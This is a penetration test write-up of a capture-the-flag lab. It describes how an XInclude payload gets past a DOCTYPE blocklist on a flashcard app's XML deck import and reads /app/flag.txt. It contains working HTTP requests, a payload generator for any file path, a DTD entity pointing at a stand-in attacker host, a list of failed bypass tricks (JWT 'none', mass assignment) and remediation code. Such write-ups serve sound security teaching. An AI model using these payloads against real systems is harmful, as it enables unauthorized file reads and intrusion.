Tanuki: XXE via XInclude (DOCTYPE Filter Bypass)
Part 1: Pentest Report
Executive Summary
Tanuki is a spaced-repetition flashcard study application (React SPA + Express JSON API) hosted on the BugForge lab platform. Users register, study seeded decks, and import custom decks via a file upload that accepts JSON or XML. The XML import path routes uploaded bodies into a libxml2-based parser; a substring filter ahead of the parser blocks the literal bytes <!DOCTYPE, closing the canonical entity-based XXE path.
Testing confirmed 1 finding:
| ID | Title | Severity | CVSS | CWE | Endpoint |
|---|---|---|---|---|---|
| F1 | XML External Entity (XXE) via XInclude on deck import | High | 6.5 | CWE-611, CWE-184 | POST /api/decks/import |
The XInclude specification does not require any DOCTYPE token, so the substring filter has nothing to match. An <xi:include> element placed inside a card’s <front> field is resolved by the parser, the file content is persisted as the card’s text, and a subsequent GET /api/study/:deckId/cards returns it verbatim. The flag was read from /app/flag.txt.
Objective
Single objective: read the flag from the lab container. Any account is acceptable; no specific identity is required.
Scope / Initial Access
# Target Application
URL: https://lab-1778630791839-gvmes8.labs-app.bugforge.io
# Auth details
Registration: open, unauthenticated, no email verification.
POST /api/register issues a JWT (HS256) with payload {id, username, iat}.
Role is not encoded in the token; it is read server-side on each request.
Test account: id=4 username=haxor
Every response carries the X-Powered-By: Express header, and JSON keys use snake_case (card_count, cards_studied). CORS is wide open (Access-Control-Allow-Origin: *).
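The token format noted under Auth details can be checked client-side by decoding the middle JWT segment. The sketch below is a minimal illustration, assuming a Node.js runtime with base64url support in Buffer; the sample token is built locally with a placeholder signature and a made-up iat value, and the function does not verify the signature.

```javascript
// Decode (NOT verify) the payload segment of a JWT.
function decodeJwtPayload(token) {
  const parts = token.split('.');
  if (parts.length !== 3) {
    throw new Error('expected three dot-separated JWT segments');
  }
  // The payload is base64url-encoded JSON.
  const json = Buffer.from(parts[1], 'base64url').toString('utf8');
  return JSON.parse(json);
}

// Hypothetical token assembled locally for illustration only.
const encode = (obj) => Buffer.from(JSON.stringify(obj)).toString('base64url');
const sampleToken = [
  encode({ alg: 'HS256', typ: 'JWT' }),
  encode({ id: 4, username: 'haxor', iat: 1700000000 }), // iat is a made-up value
  'placeholder-signature'
].join('.');

const claims = decodeJwtPayload(sampleToken);
// No role claim is present, matching the observation that role is read server-side.
console.log(Object.keys(claims));
```

Because the role never appears in the payload, forging or editing claims would not by itself change the role the server looks up for the account.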
Reconnaissance: Frontend Advertised an XML Parse Path the Walkthrough Skipped
- The compiled React bundle (main.2a8c2eb1.js, md5 486d073089df9e3216ceed5c49dff009) was byte-identical to a prior Tanuki engagement. Frontend code unchanged; backend may or may not be.
- The deck import file picker declares accept=".json,.xml". The operator walkthrough only exercised the JSON path; the XML path was wired but never tested.
- The JWT carries {id, username, iat} only. The /api/verify-token response includes a role field read from the database, and the frontend gates the /admin link on user.role === "admin".
- The seeded user table holds at least 3 prior accounts before the registered test account (id=4), implying id=1 is likely the administrator.
- /api/admin/users[/:id], /api/admin/decks[/:id], and /api/admin/cards[/:id] are referenced from the bundle as full CRUD surfaces.
The XML import surface (observation 2) was the primary motivator for the XXE hypothesis.
Application Architecture
| Component | Detail |
|---|---|
| Backend | Node.js Express (x-powered-by: Express on every response) |
| Frontend | React SPA + Material-UI, single bundle ~516 KB |
| Auth | JWT HS256, payload {id, username, iat}; role read from DB on each request |
| XML parser | libxml2-backed (Node binding such as libxmljs or libxmljs2); XInclude enabled; XML_PARSE_NONET set (network blocked); XML_PARSE_DTDLOAD evidently off (DTD loading not observed) |
| CORS | Access-Control-Allow-Origin: * everywhere |
API Surface
| Endpoint | Method | Auth | Notes |
|---|---|---|---|
| /api/register | POST | No | Public registration; returns JWT |
| /api/login | POST | No | Username + password |
| /api/verify-token | GET | Yes | Returns {user: {id, username, email, full_name, role}} |
| /api/decks | GET | Yes | Lists seeded decks (id 1, 2, 3) |
| /api/decks/:id | GET | Yes | Single deck details |
| /api/decks/import | POST | Yes | Multipart upload; declared formats .json and .xml |
| /api/study/:deckId/cards | GET | Yes | Cards for a deck, including front / back fields |
| /api/study/progress | POST | Yes | SM-2 review submission |
| /api/study/session | POST | Yes | Records a study session |
| /api/admin/users[/:id] | GET / POST / PUT / DELETE | Yes (admin) | Server returns 403 {"error":"Admin access required"} for non-admin |
Known Users
| Username | ID | Role |
|---|---|---|
| (unknown, presumed admin) | 1 | admin (inferred from FE role-gated link and admin-middleware existence) |
| (unknown) | 2 | unknown |
| (unknown) | 3 | unknown |
| haxor | 4 | user |
Attack Chain Visualization
┌───────────────────────┐ ┌────────────────────────┐ ┌──────────────────────┐ ┌────────────────────────┐
│ POST /api/decks/ │ │ POST /api/decks/import │ │ Parser resolves │ │ GET /api/study/:id/ │
│ import with <!DOCTYPE │ ▶ │ with xmlns:xi + │ ▶ │ file:///app/flag.txt │ ▶ │ cards returns flag in │
│ → 400 (filter blocks) │ │ <xi:include> in card │ │ and persists it as │ │ the card's front field │
│ │ │ front → 200 imported │ │ card.front │ │ │
└───────────────────────┘ └────────────────────────┘ └──────────────────────┘ └────────────────────────┘
Findings
F1: XML External Entity (XXE) via XInclude on deck import
Severity: High
CVSS v3.1: 6.5, CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
CWE: CWE-611 (Improper Restriction of XML External Entity Reference), CWE-184 (Incomplete List of Disallowed Inputs)
Endpoint: POST /api/decks/import
Authentication required: Yes (any registered account; registration is open and unrestricted)
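The 6.5 base score can be reproduced from the vector string. The sketch below applies the CVSS v3.1 base-score equations and metric weights as published in the FIRST specification; the function and constant names are illustrative, and temporal and environmental metrics are not handled.

```javascript
// CVSS v3.1 base metric weights (from the FIRST specification).
const AV = { N: 0.85, A: 0.62, L: 0.55, P: 0.2 };
const AC = { L: 0.77, H: 0.44 };
const UI = { N: 0.85, R: 0.62 };
const CIA = { H: 0.56, L: 0.22, N: 0 };
// Privileges Required depends on whether Scope is Unchanged (U) or Changed (C).
const PR = { U: { N: 0.85, L: 0.62, H: 0.27 }, C: { N: 0.85, L: 0.68, H: 0.5 } };

// Round up to one decimal place, using the integer-based method from the spec.
function roundUp(value) {
  const scaled = Math.round(value * 100000);
  if (scaled % 10000 === 0) return scaled / 100000;
  return (Math.floor(scaled / 10000) + 1) / 10;
}

function baseScore(vector) {
  // Drop the "CVSS:3.1" prefix and turn "AV:N" style pairs into an object.
  const m = Object.fromEntries(vector.split('/').slice(1).map((p) => p.split(':')));
  const iss = 1 - (1 - CIA[m.C]) * (1 - CIA[m.I]) * (1 - CIA[m.A]);
  const changed = m.S === 'C';
  const impact = changed
    ? 7.52 * (iss - 0.029) - 3.25 * Math.pow(iss - 0.02, 15)
    : 6.42 * iss;
  const exploitability = 8.22 * AV[m.AV] * AC[m.AC] * PR[m.S][m.PR] * UI[m.UI];
  if (impact <= 0) return 0;
  const raw = changed ? 1.08 * (impact + exploitability) : impact + exploitability;
  return roundUp(Math.min(raw, 10));
}

const score = baseScore('CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N');
console.log(score); // 6.5
```

For this vector the impact sub-score is 6.42 × 0.56 ≈ 3.60 and the exploitability sub-score is 8.22 × 0.85 × 0.77 × 0.62 × 0.85 ≈ 2.84; their sum, about 6.43, rounds up to 6.5.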
Description
The XML deck import endpoint is gated by a case-sensitive UTF-8 substring filter on the literal bytes <!DOCTYPE before the body reaches the parser. The filter blocks canonical entity-based XXE payloads (any body containing <!DOCTYPE returns 400 {"error":"Invalid file format or content"}).
XInclude does not require any DOCTYPE token. An XML body containing only the namespace declaration xmlns:xi="http://www.w3.org/2001/XInclude" and an <xi:include parse="text" href="file:///path"/> element passes the filter, is parsed by libxml2 with XInclude enabled, and the include is resolved during parse. The resolved file content is then assigned to whichever element contained the <xi:include> and is persisted as part of the imported deck. Reading the deck back via GET /api/study/:deckId/cards returns the file content verbatim in the card’s front field.
Two defects compound here:
- The pre-parse filter is a substring blocklist on a single token (<!DOCTYPE). It does not reject XInclude payloads or any other non-DTD XML feature that can resolve external resources.
- The XML parser is configured with XInclude resolution enabled and file:// resolution allowed. Only network resolution is blocked (XML_PARSE_NONET set), which prevents out-of-band (OOB) exfiltration but does not prevent local file reads.
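The first defect is easy to demonstrate in isolation. The sketch below assumes the filter behaves like a plain case-sensitive substring check, which is consistent with the observed responses but was not confirmed from server source; naiveDoctypeFilter is an illustrative name.

```javascript
// Assumed shape of the server-side pre-parse filter: true means "reject".
function naiveDoctypeFilter(body) {
  return body.includes('<!DOCTYPE');
}

const canonicalXxe = [
  '<?xml version="1.0"?>',
  '<!DOCTYPE deck [<!ENTITY oob SYSTEM "http://attacker/p1">]>',
  '<deck><name>&oob;</name></deck>'
].join('\n');

const xincludeProbe = [
  '<?xml version="1.0"?>',
  '<deck xmlns:xi="http://www.w3.org/2001/XInclude">',
  '<cards><card>',
  '<front><xi:include parse="text" href="file:///app/flag.txt"/></front>',
  '<back>b</back>',
  '</card></cards>',
  '</deck>'
].join('\n');

console.log(naiveDoctypeFilter(canonicalXxe));  // true  (blocked)
console.log(naiveDoctypeFilter(xincludeProbe)); // false (reaches the parser)
```

The XInclude body contains no DOCTYPE declaration at all, so no refinement of the token match (case folding, whitespace tolerance) would catch it; the control has to live in the parser configuration.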
Impact
Arbitrary file read on the application container, scoped to whatever Unix user the Node process runs as.
Reproduction
Step 1: Confirm the DOCTYPE filter rejects canonical XXE
POST /api/decks/import HTTP/1.1
Host: lab-1778630791839-gvmes8.labs-app.bugforge.io
Authorization: Bearer <JWT>
Content-Type: multipart/form-data; boundary=----b

------b
Content-Disposition: form-data; name="file"; filename="x.xml"
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE deck [<!ENTITY oob SYSTEM "http://attacker/p1">]>
<deck><name>&oob;</name></deck>
------b--
Response: 400 {"error":"Invalid file format or content"}. The same body without the <!DOCTYPE line parses successfully.
Step 2: Send an XInclude-based payload pointing to /app/flag.txt
POST /api/decks/import HTTP/1.1
Host: lab-1778630791839-gvmes8.labs-app.bugforge.io
Authorization: Bearer <JWT>
Content-Type: multipart/form-data; boundary=----b

------b
Content-Disposition: form-data; name="file"; filename="x.xml"
Content-Type: application/xml

<?xml version="1.0"?>
<deck xmlns:xi="http://www.w3.org/2001/XInclude">
  <name>x</name>
  <description>d</description>
  <category>p</category>
  <cards>
    <card>
      <front><xi:include parse="text" href="file:///app/flag.txt"/></front>
      <back>b</back>
    </card>
  </cards>
</deck>
------b--
Response: 200 {"id":N,"message":"Deck imported successfully","cards_count":1}. The numeric id is the new deck identifier.
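The multipart framing used in Steps 1 and 2 can also be assembled programmatically. The sketch below is one way to do it in Node.js, assuming the form field is named file as in the captured request; buildMultipartBody and importDeck are illustrative names, and importDeck relies on the global fetch available in recent Node.js releases.

```javascript
// Build a single-part multipart/form-data body. Each delimiter line is
// "--" + boundary, lines end with CRLF, and an empty line separates the
// part headers from the part content.
function buildMultipartBody(boundary, filename, xml) {
  return [
    `--${boundary}`,
    `Content-Disposition: form-data; name="file"; filename="${filename}"`,
    'Content-Type: application/xml',
    '',
    xml,
    `--${boundary}--`,
    ''
  ].join('\r\n');
}

// Hypothetical helper: POST the body to the import endpoint.
// baseUrl and jwt are supplied by the caller; nothing is sent until it is invoked.
async function importDeck(baseUrl, jwt, xml) {
  const boundary = '----b';
  const response = await fetch(`${baseUrl}/api/decks/import`, {
    method: 'POST',
    headers: {
      Authorization: `Bearer ${jwt}`,
      'Content-Type': `multipart/form-data; boundary=${boundary}`
    },
    body: buildMultipartBody(boundary, 'x.xml', xml)
  });
  return { status: response.status, body: await response.json() };
}

const exampleBody = buildMultipartBody('----b', 'x.xml', '<deck/>');
console.log(exampleBody.split('\r\n')[0]); // ------b
```

With the boundary ----b declared in the Content-Type header, the delimiter lines in the body are ------b and the closing delimiter is ------b--, matching the raw requests above.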
Step 3: Read the resolved content back via the study endpoint
GET /api/study/N/cards HTTP/1.1
Host: lab-1778630791839-gvmes8.labs-app.bugforge.io
Authorization: Bearer <JWT>
Response (abridged):
[
{
"id": M,
"front": "bug{uA8e4RWc9adWFnqaHR6ULX3az5j287ap}",
"back": "b",
"difficulty": 0.5,
"repetitions": 0
}
]
The card’s front field contains the file content. Substitute any readable file path in the href to read other files within the parser’s scope.
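Substituting other paths is a matter of regenerating the deck with a different href. The sketch below builds the Step 2 payload for an arbitrary absolute path and pulls the front fields out of a Step 3 response; buildXIncludeDeck and extractFronts are illustrative names, and the sample response object is a placeholder, not captured output.

```javascript
// Escape characters that would break out of a double-quoted XML attribute.
function escapeXmlAttribute(value) {
  return value.replace(/&/g, '&amp;').replace(/</g, '&lt;').replace(/"/g, '&quot;');
}

// Build a deck whose single card pulls the target file in via XInclude.
function buildXIncludeDeck(absolutePath) {
  if (!absolutePath.startsWith('/')) {
    throw new Error('expected an absolute path such as /app/flag.txt');
  }
  const href = escapeXmlAttribute(`file://${absolutePath}`);
  return [
    '<?xml version="1.0"?>',
    '<deck xmlns:xi="http://www.w3.org/2001/XInclude">',
    '  <name>x</name>',
    '  <description>d</description>',
    '  <category>p</category>',
    '  <cards>',
    '    <card>',
    `      <front><xi:include parse="text" href="${href}"/></front>`,
    '      <back>b</back>',
    '    </card>',
    '  </cards>',
    '</deck>'
  ].join('\n');
}

// Collect the reflected field from the parsed JSON of GET /api/study/:deckId/cards.
function extractFronts(cards) {
  return cards.map((card) => card.front);
}

const payload = buildXIncludeDeck('/etc/hostname');
const sampleCards = [{ id: 1, front: '<file content here>', back: 'b' }]; // placeholder data
console.log(extractFronts(sampleCards));
```

Files containing bytes that are not valid in the declared encoding, or that the Node process cannot read, would be expected to fail at include time rather than return partial content.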
Remediation
Fix 1: Disable XInclude in the parser
// BEFORE (Vulnerable), libxmljs2-style options
const parsed = libxml.parseXml(body, {
noent: false,
nonet: true,
xinclude: true
});
// AFTER (Secure)
const parsed = libxml.parseXml(body, {
noent: false,
nonet: true,
xinclude: false,
dtdload: false,
doctype: false
});
Fix 2: If XInclude must be supported, restrict scheme and path resolution
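// BEFORE (Vulnerable), XInclude resolves any file:// URI
const parsed = libxml.parseXml(body, { xinclude: true });
// AFTER (Secure), replace the resource loader with an allowlist.
// NOTE: resourceLoader, ALLOWED_INCLUDES, and readWhitelistedResource are
// illustrative names, not documented libxmljs2 options. Confirm that the
// binding in use exposes an equivalent hook; if it does not, resolve the
// allowed includes in application code and keep xinclude disabled.
const parsed = libxml.parseXml(body, {
xinclude: true,
resourceLoader: (uri) => {
if (!ALLOWED_INCLUDES.has(uri)) {
throw new Error('XInclude target not permitted');
}
return readWhitelistedResource(uri);
}
});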
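The allowlist decision in Fix 2 can be sketched independently of any parser hook. The example below resolves an include href against a fixed base directory using the WHATWG URL class and accepts it only if the normalized result stays inside that directory; isIncludeAllowed and the /srv/includes/ base are hypothetical, and the check does not follow symlinks.

```javascript
// Accept an XInclude href only if it resolves to a file: URL inside baseDirUrl.
// baseDirUrl must be a file: URL ending in "/", e.g. "file:///srv/includes/".
function isIncludeAllowed(href, baseDirUrl) {
  let resolved;
  try {
    // Relative hrefs resolve against the base; "." and ".." segments are normalized.
    resolved = new URL(href, baseDirUrl);
  } catch {
    return false; // unparseable href
  }
  if (resolved.protocol !== 'file:' || resolved.host !== '') {
    return false; // rejects http:, https:, and file URLs that name a host
  }
  const basePath = new URL(baseDirUrl).pathname;
  return resolved.pathname.startsWith(basePath);
}

const BASE = 'file:///srv/includes/'; // hypothetical include directory
console.log(isIncludeAllowed('common/header.xml', BASE));    // true
console.log(isIncludeAllowed('../etc/passwd', BASE));        // false
console.log(isIncludeAllowed('file:///app/flag.txt', BASE)); // false
console.log(isIncludeAllowed('http://attacker/p1', BASE));   // false
```

Whatever component finally opens the file should use the same resolved URL that was checked, so that the decision and the read cannot diverge.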
Fix 3: Replace the substring blocklist with parser-level hardening
// BEFORE (Vulnerable), pre-parse string check
if (body.includes('<!DOCTYPE')) {
return res.status(400).json({ error: 'Invalid file format or content' });
}
const parsed = libxml.parseXml(body);
// AFTER (Secure), drop the string blocklist and configure the parser
const parsed = libxml.parseXml(body, {
noblanks: true,
noent: false,
nonet: true,
xinclude: false,
dtdload: false,
dtdvalid: false,
doctype: false
});
Additional recommendations:
- Stop using string blocklists as the primary defense against XXE. They are bypassable through encoding, case, whitespace, and class-of-attack pivots (XInclude here).
- Treat XML deserialization as a sensitive operation; gate parser configuration centrally rather than per-handler.
- For deck import specifically, prefer JSON-only on the wire; if XML support is a product requirement, convert the parsed document to a constrained intermediate object and validate it against a schema (e.g. JSON Schema) before persistence.
- Restrict the application’s filesystem view at the container layer (read-only root filesystem, separate volume for flag/secret material, file ACLs that deny the Node user access to /app/flag.txt and .env-style files).
- Apply consistent input validation across all upload-accepting endpoints, not just the one most recently scrutinized.
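The constrained-intermediate recommendation can be sketched as a plain shape check applied after parsing and before persistence. The field names below follow the deck XML used in the reproduction; the length limits and the validateDeck name are assumptions chosen for illustration. This limits what an import can store but is not a substitute for disabling XInclude in the parser.

```javascript
// Assumed limits; tune to the product's real constraints.
const LIMITS = { name: 100, description: 500, category: 50, cardText: 2000, cards: 500 };

function isBoundedText(value, max) {
  return typeof value === 'string' && value.length > 0 && value.length <= max;
}

// Validate the intermediate object produced from an uploaded deck.
function validateDeck(deck) {
  if (deck === null || typeof deck !== 'object' || Array.isArray(deck)) {
    return { ok: false, errors: ['deck must be an object'] };
  }
  const errors = [];
  for (const field of ['name', 'description', 'category']) {
    if (!isBoundedText(deck[field], LIMITS[field])) {
      errors.push(`${field} must be a non-empty string of at most ${LIMITS[field]} characters`);
    }
  }
  if (!Array.isArray(deck.cards) || deck.cards.length === 0 || deck.cards.length > LIMITS.cards) {
    errors.push('cards must be a non-empty array within the size limit');
  } else {
    deck.cards.forEach((card, i) => {
      if (card === null || typeof card !== 'object') {
        errors.push(`cards[${i}] must be an object`);
        return;
      }
      for (const side of ['front', 'back']) {
        if (!isBoundedText(card[side], LIMITS.cardText)) {
          errors.push(`cards[${i}].${side} must be a bounded non-empty string`);
        }
      }
    });
  }
  return { ok: errors.length === 0, errors };
}

const good = validateDeck({
  name: 'x', description: 'd', category: 'p',
  cards: [{ front: 'f', back: 'b' }]
});
const bad = validateDeck({ name: 'x', cards: [{ front: { nested: true }, back: 'b' }] });
console.log(good.ok, bad.ok); // true false
```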
OWASP Top 10 Coverage
- A05:2021, Security Misconfiguration: XML parser is configured with XInclude enabled by default. The protective measure (XML_PARSE_NONET) addresses the network resolution case but the local file resolution case was left enabled.
- A03:2021, Injection: XInclude is an XML-feature injection: an attacker-controlled element is interpreted as a parser directive rather than as data.
Tools Used
| Tool | Purpose |
|---|---|
| Caido | HTTP proxy and request editor for replaying and modifying requests captured from the operator walkthrough |
| curl | Manual multipart payload construction for the XInclude probes (--data-binary + heredoc) |
| Bash | Wrapping multipart boundary construction and iterating through candidate file paths |
References
- CWE-611, Improper Restriction of XML External Entity Reference: https://cwe.mitre.org/data/definitions/611.html
- CWE-184, Incomplete List of Disallowed Inputs: https://cwe.mitre.org/data/definitions/184.html
- OWASP XML External Entity (XXE) Prevention Cheat Sheet: https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html
- W3C XInclude 1.0 specification: https://www.w3.org/TR/xinclude/
- libxml2 parser options reference: https://gnome.pages.gitlab.gnome.org/libxml2/devhelp/libxml2-parser.html
Part 2: Notes / Knowledge
Key Learnings
- XInclude bypasses <!DOCTYPE substring filters on XML uploads. When DOCTYPE is the only filter, XInclude is the open door. Probe shape: <root xmlns:xi="http://www.w3.org/2001/XInclude"><elem><xi:include parse="text" href="file:///path"/></elem></root>, substituting the app’s schema for <root>/<elem> so the resolved text lands in a reflected field. Surfaced in libxml2 (Node libxmljs, libxmljs2), Python lxml, and Java parsers built on JAXP, wherever XInclude is enabled by parser flag.
Failed Approaches
| Approach | Result | Why It Failed |
|---|---|---|
| Canonical DOCTYPE-bearing XXE (<!DOCTYPE deck [<!ENTITY oob SYSTEM "...">]>) | 400 Invalid file format or content | Substring filter on <!DOCTYPE blocks the body before it reaches the parser |
| Bare DOCTYPE (<!DOCTYPE deck> with no entities) | 400 same response | Filter matches the literal <!DOCTYPE token regardless of what follows |
| Internal entity declaration without SYSTEM/PUBLIC | 400 same response | Filter does not distinguish entity types; rejects any <!DOCTYPE body |
| Parameter entity (<!ENTITY % p "v">) | 400 same response | Same filter; classification of entity semantics is irrelevant |
| Lowercase doctype (<!doctype ...>) | 200, deck imported with cards_count: 0 | Filter is case-sensitive so the body passes, but the resulting XML is invalid and the parser falls through to a stub path that imports an empty deck |
| Extra-whitespace doctype (<! DOCTYPE ...>) | 200, cards_count: 0 | Same as above; bypasses the filter but produces invalid XML |
| UTF-16 LE with BOM | 400 or 200 stub | Parser does not respect UTF-16 charset on the multipart part |
| Content-Type: text/xml instead of application/xml | 400 | Filter is content-type independent |
| Filename .json with XML content | 400 | Filter inspects body, not filename |
| XInclude with parse="text" href="http://..." | 200, card front: "[object Object]" | XML_PARSE_NONET blocks network resolution; the include fails and the parser emits a stub value |
| Frontend-only admin gate hypothesis (direct GET /api/admin/users with non-admin JWT) | 403 Admin access required | Server-side middleware enforces role; the frontend gate is not the only check |
| Mass assignment of role: "admin" on registration | 200, but verify-token returns role: "user" | Registration handler whitelists known fields; extra keys are silently dropped |
| JWT alg: "none" against /api/verify-token | 403 Invalid token | Server pins acceptable algorithms; unsigned tokens are rejected before role check |